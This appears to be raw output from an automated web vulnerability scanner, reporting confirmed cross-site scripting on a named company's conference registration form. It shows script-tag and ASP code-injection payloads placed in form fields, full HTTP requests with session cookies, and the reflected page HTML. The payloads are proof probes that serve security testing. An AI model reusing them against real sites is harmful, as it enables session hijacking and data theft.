<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="''"--></style></script><script>netsparker(0x005705)</script>">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
..
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
glastname POST '"--></style></script><script>alert(0x005706)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:29 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20128
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last name:
</td>
<td colspan="2" al..
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
inDate POST --><script>alert(9)</script>

Request

POST /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Content-Length: 52
Expect: 100-continue
Accept-Encoding: gzip, deflate

inDate=--%3e%3cscript%3enetsparker(9)%3c%2fscript%3e

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:40 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20130
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value="3">3</option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="OR">Oregon</option>
<option value="PA">Pennsylvania</option>
<option value="RI">Rhode Island</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VI">Virgin Islands</option>
<option value="VA">Virginia</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="PR">Puerto Rico</option>
<option value="GU">Guam</option>
</select></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Zip Code: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="zip" type="text" id="zip" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Country:
</td>
<td colspan="2" align="left">
<input name="country" type="text" id="country" size="35" value="3">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Phone Number: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">
<input name="phone" type="text" id="phone" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
E-mail address: <font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="email" type="text" id="email" size="35" value="<% response.write(268409241-22) %>">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font"><font color="#FF0000">EMAIL DOES NOT MATCH<br>
Retype E-mail address:*</font></td>
<td colspan="2" align="left">
<font color="#FF0000">
<input name="reEmail" type="text" id="reEmail" size="35"> &nbsp;&nbsp;&nbsp;&nbsp;<b><<</b></font>
</td>
</tr>


<tr align="left" valign="top" class="mid_font">
<td colspan="3" class="mid_font">
Would you prefer to be contacted by e-mail or phone?


<input name="contact" type="radio" value="e-mail">
E-mail
<input name="contact" type="radio" value="phone"checked>
Phone <br><br>
</td>
</tr>


<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="3" class="mid_font"><strong>Guest Information </strong></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest First name:
</td>
<td colspan="2" align="left">


<input name="gfirstname" type="text" id="gfirstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Guest Last name:
</td>
<td colspan="2" ..
- /forms/palConference.asp

/forms/palConference.asp CONFIRMED

Parameters

Parameter Type Value
error GET email
outDate POST '"--></style></script><script>alert(0x005749)</script>

Request

GET /forms/palConference.asp?error=email HTTP/1.1
Referer: http://www.stansberryresearch.com/stp_ircs/feedback/pal_registration.asp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.stansberryresearch.com
Cookie: ASPSESSIONIDQACQTSTA=OLBOLMLBJNMPDOJIKBPKNADM; EOA+Scribble+Short+%2D+New+Style=EOA+Scribble+Short+%2D+New+Style; ASPSESSIONIDQSTBRQSC=EHHBMFABANKAIOBIIBKGHDCM; Overseas+0611=Overseas+0611; RDB=c803000000000000002d2d2d2d2d2d2d2d2d2d2d2d2d2d2d00000000000000000000000000
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 04 Nov 2011 05:55:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="UNI STA NAV COM INT DELi CUR TAI NON COR BUS DSP"
X-Powered-By: ASP.NET
Content-Length: 20132
Content-Type: text/html
Cache-control: private




<html>
<head>
<title>Stansberry & Associates</title>
<link rel="stylesheet" href="/secure/includes/css.css" type="text/css" />
<script language="JavaScript" src="/forms/includes/javascript/date_validation.js"></script>
<script language="JavaScript" src="/forms/includes/javascript/CalendarPopup.js"></script>
<script language="JavaScript">
var cal = new CalendarPopup();
</script>
<script language="javascript"
type="text/javascript">

function validateForm(pal)
{

if(""==document.forms.pal.firstname.value)
{
alert("Please enter your first name.");
return false;
}
if(""==document.forms.pal.lastname.value)
{
alert("Please enter your last name.");
return false;
}
if(""==document.forms.pal.address1.value)
{
alert("Please enter your address.");
return false;
}
if(""==document.forms.pal.city.value)
{
alert("Please enter city.");
return false;
}
if(""==document.forms.pal.zip.value)
{
alert("Please enter zip code.");
return false;
}
if(""==document.forms.pal.phone.value)
{
alert("Please enter your phone number.");
return false;
}

if(""==document.forms.pal.email.value)
{
alert("Please enter your email address.");
return false;
}
}
</script>




<script language="JavaScript">
function setVisibility(id, visibility) {
document.getElementById(id).style.display = visibility;
}
</script>


</head>
<body bgcolor="#CCCCCC">
<table width="625" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#FFFFFF">
<tr>
<td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="left" valign="top"><div align="center"><img src="/secure/images/pal_header.gif" border="0"></div></td>
</tr>
<tr>
<td><table width="600" border="0" align="center" cellpadding="3" cellspacing="0">
<tr><td bgcolor="#999999">&nbsp;
</td>
</tr>
</table>
</td>

</tr>
<tr>
<td>
<table width="600" border="0" align="center" cellpadding="10" cellspacing="0">
<tr>
<td align="center" valign="top" class="mid_font">
<b>2009 Alliance Registration Form</b><br>
<b>Monday, November 9th, 2009</b><br><br>
<b><font color="FF0000">You must register by Friday, August 28<sup>th</sup> to guarantee your spot.</font></b>

<form action="/stp_ircs/feedback/pal_registration.asp" method="post" name="pal" id="pal" onSubmit="return validateForm(pal);">
<table width="100%" border="0" cellpadding="5" cellspacing="0" class="border">
<tr align="left" valign="top" bgcolor="#eeeeee" class="mid_font">
<td colspan="2" class="mid_font"><strong><font size="2">Personal Information </strong></td>
<td width="22%" class="mid_font"><div align="right"><strong><font color="#FF0000" size="1" face="Verdana, Arial, Helvetica, sans-serif">* Required Field</strong></div></td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

Title:
</td>
<td colspan="2" align="left">

<select name="title" id="title">

<option value=""></option>

<option value="Dr.">Dr.</option>
<option value="Mr.">Mr.</option>
<option value="Mrs.">Mrs.</option>
<option value="Ms.">Ms.</option>
<option value="Miss.">Miss.</option>
<option value="Pr.">Pr.</option>
<option value="Prof.">Prof.</option>
</select>

</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td width="31%" class="mid_font">

First name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">


<input name="firstname" type="text" id="firstname" size="35" value="Smith">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Last name:
<font color="#FF0000">*</font></td>
<td colspan="2" align="left">

<input name="lastname" type="text" id="lastname" size="35" value="Smith">
</td>
</tr>

<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 1: <font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="address1" type="text" id="address1" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
Address 2:
</td>
<td colspan="2" align="left">
<input name="address2" type="text" id="address2" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">
City:<font color="#FF0000">*</font>
</td>
<td colspan="2" align="left">
<input name="city" type="text" id="city" size="35" value="3">
</td>
</tr>
<tr align="left" valign="top" class="mid_font">
<td class="mid_font">State:
</td>
<td colspan="2" align="left">
<select name="state_" size="1" id="state_">


<option value="3">3</option>


<option value="">----------------------------------------------------</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District of Columbia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
